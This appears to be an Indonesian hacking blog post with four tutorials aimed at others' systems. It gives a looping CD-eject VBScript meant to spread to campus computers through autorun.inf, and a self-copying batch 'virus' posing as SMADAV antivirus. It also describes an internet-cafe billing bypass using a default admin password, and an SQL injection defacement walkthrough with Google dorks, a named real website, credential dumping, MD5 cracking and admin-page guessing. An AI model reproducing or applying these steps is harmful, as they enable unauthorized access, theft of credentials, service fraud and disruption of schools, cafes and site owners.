Selamat siang agan agan semua, nih saya mau berbagi trik Komputer sedikit Buat  “Virus” Nakal, buat ngerjain dosen/guru yang kita ngga suka, lagi suntuk di ruang labkom kampus/Sekolah pusing ngga bisa maen Internetan atau tidak bisa untuk Akses facebook ???
Mari kita kerjain Aslab beserta Dosen/Guru nya dengan cara yang sangat ini

Caranya: Buka notepad dan masukkan code berikut :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpanlah dengan file tadi dengan ekstensi file orlando.vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan  terbuka/tertutup dengan sendirinya tanpa henti.

Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk anda, jadi setiap loe colokin ke kompie kampus, maka akan otomatis dijalankan “Virus” Nakal ini.

Ane bingung mau nulis tutor apaan, tapi mungkin ini sedikit berguna buat sobat-sobat yang suka bermain dengan virus yang memakai ekstensi .bat. ya udah kita mulai praktekan aja yah... hehehe :D

Script virus berekstensi .bat hanya terdiri dari beberapa kata perintah seperti echo, pause, cls dan beberapa script perintah jika kita ingin bermain diregistri komputer.

Contoh penulisan script virus: Copy %0 C:\
Fungsinya virus akan terus menerus menduplikasi aplikasinya sehingga begitu kita delete si 
master virus seperti amoeba, Mereka akan terus menerus menyerang kompi lawan.Kita akan coba bikin sedikit masalah sama kompi, ini script kita save dengan nama apa saja misal musik.bat
Untuk Menampilkan Komunitas

• @echo off
  echo ================================
  echo ================================
  echo created by Cirebon-Cyber4rt
  echo Hnc Team was cleaned
  echo ================================
  echo ================================

Menampilkan Kata Pengantar [ bisa diubah sesuai keinginan ]

• echo .
  echo Readme.txt
  echo Antivirus portable dari SMADAV untuk membersihkan virus lokal
  echo untuk mengapusnya anda cukup masukan code virus yang terdeteksi
  echo seperti code : 1.Trojan 2.Malware 3.Bat 4.VBS
  echo Contoh: 1…lalu tekan Enter
  echo Hapus dan Bersihkan lalu tekan Enter
  echo Kamu yakin?? lalu tekan Enter
  echo Mudah bukan…???
  echo majukan aplikasi buatan negeri sendiri Bro...
  echo .

Menampilkan Registrasi pembuatnya

• echo Register Cirebon-Cyber4rt and supported by Hacker-Newbie
  pause
  echo Masukkan 1,2,3,4
  pause
  echo Begin scanning Virus….. tekan Enter

Kalau mau dirubah jadi .bat, keterangan \\keterangan dihapus saja dan script dijadikan menjadi satu kesatuan. Selamat mencoba dan semoga bermanfaat tutorial saya yang simpel ini.

Kemaren pas mau maen game online ga ada duit, terus temen ane ada yang bisikin gini,"kita hack billingnya aja yuk!"

terheran-heran ane, emang bisa?" kan diwarnet pengamanannya ketat...

trus temen ane bilang, jah elu, hari gini ga bisa jebol billing warnet?!

udah, yuk langsung kita praktekin aja...!

Kebetulan aja pake billing eksplore 2009
Gambar Ikan Itu Lo Billingnya
Ternyata Sangat Mudah Buat Gratis Di billing Ini Tanpa Bayar
Kelemahan Di Password Default dari Billing Ini.

Caranya Sangat-sangat Simple :
Komputer Masih dalam keadaan Terkunci Billing Ya !
-- Restart Komputer Warnet Dan Lepas Kabel LAN nya...
-- Otomatis Billing Akan Tetap bekerja Tapi Hanya Menu Admion Dan Panduan Yang Bisa Di klik

-- login admin (dengan LAN tanpa Nancep Ya)
-- Passwordnya PASTI 008 (All Tester)
-- Lalu Exit Client masukin Password 008 sekali lagi
-- Kemudian Hapus security klien lalu exit client

-- Billing udah masuk Kita Login sebagai admin
-- Tinggal nancepin kabel LAN aja kita bisa bersurfing internet tanpa billing 

NB :Hati-hati ketauan sama Operator'nya, bisa-bisa kita diusir lagi :D hahaha...

Ada tutorial hacking website lagi nih, lumayan SQL Injection. Kalo sebelumnya saya pernah share tentang Cara Deface Website Forum Sederhana Untuk Newbie yang tutorialnya pake skema "order+by+bla.. bla.. bla" nah sekarang saya akan share tentang cara deface lagi nih sob, tapi yang ini lebih mudah karena kita pake software, jadi tinggal klak-klik aja juga kelar. Tapi ada efek sampingnya juga pake cara ini, Bikin Orang Jadi Males hahaha :D Tapi kalo udah tau dasarnya yang pake "order+by+ bla... bla..." it's ok lah, yang penting kita tau jalannya klo disuruh manual, kalo belum tau cara manualnya baca ini dulu Cara Hacking Website Dengan Teknik SQL Injection :D

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Yang pertama dan wajib ada yaitu Toolsnya:

• SQLi Helper 2.7 | 127 KB
• Password: cirebon-cyber4rt
• 
  

Langkah kedua adalah mencari website yang vulnerabillity ( terdapat celah keamanan ), Lah carinya dimana? gampang sob, cari aja di Google :D ada banyak disana. Akh males nyarinya, yaudah nih aku kasih dorknya aja biar lebih mudah. Caranya? caranya masukan dork dibawah ini ke mesin pencarian Google, nanti muncul seribu satu macam website yang sama, nah tinggal kamu pilih satu-satu, cari yang vuln ( terdapat celah keamanan ), OK.

Google Dork SQL Injection

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category= 
• inurl:article.php?ID= 
• inurl:play_old.php?id= 
• inurl:games.php?id= 

Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk sobat.

Langkah ketiga, Sebelum memulai attacking kita harus menemukan website yang bisa dihack ( vulnerabillity ). Dari ribuan website dari dork yang saya berikan diatas, belum tentu salah satunya yang bisa dihack. Untuk mengetahuinya kita harus memberi tanda petik di akhir alamat website.

Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316 menjadi http://www.wheelieboymotorsports.com/product_detail.php?pid=316'. Jika terdapat tulisan

• Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname. Atau Sebagainya yang mirip.

Berarti Website tersebut bisa dihack ( vuln )
Copy Url yang sobat dapatkan tadi ke kolom target.
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316. ( tidak pakai tanda petik )

Kemudian klik Inject. Maka secara otomatis tools akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll. Jika Inject berhasil akan muncul tampilan seperti ini.

Kalau sudah klik Get Database.
*Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawah, saya memilih database natural. Selanjutnya klik Get Tables.

Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.

Langkah Keempat, Kolom SQL
Jika sudah pilih User kalian klik get Coloumns.
Di Coloumns block yang usr_login dan usr_pass atau user_name dan password_admin lalu klik Dump Now.

Setelah itu akan muncul tampilan seperti ini

Pilih salah satu dari user login dan user password tersebut.

Ada yang aneh? Password yang ditampilkan bentuknya kok seperti ini ya?

• 987d29241cc4f2a7465f2d9356ab3615
• 987d29241cc4f2a7465f2d9356ab3615

Langkah Kelima, MD5 Password
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?

Caranya cukup mudah, buka saja situs MD5 Crack, lalu masukkan kode tersebut dikotak penelusuran. Berdo'a saja password yang sobat dapatkan tersebut cukup lemah, sehingga bisa dipecahkan dengan metode Bruto Force. Setelah sobat masukkan, lalu klik Crack hash baby.

Selesai. sekarang cari halaman login atau adminnya.
Ada beberapa halaman login yang bisa sobat pakai ( coba satu-satu )

• http://target.com/admin1.php/
• http://target.com/admin1.html
• http://target.com/admin2.php
• http://target.com/admin.php
• http://target.com/controlpanel/

NOTE - Bagi yang PC nya kedetect virus atau takut PC nya kena virus, bisa pake sandboxie biar lebih aman Click Here

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 , mungkin bagi yang belum tau teknik SQLi Injection cara diatas masih sangat sulit untuk dipahami, tapi saya yakin dengan latihan dan ketekunan pasti akan sobat akan paham.

Credit by : cirebon-cyber4rt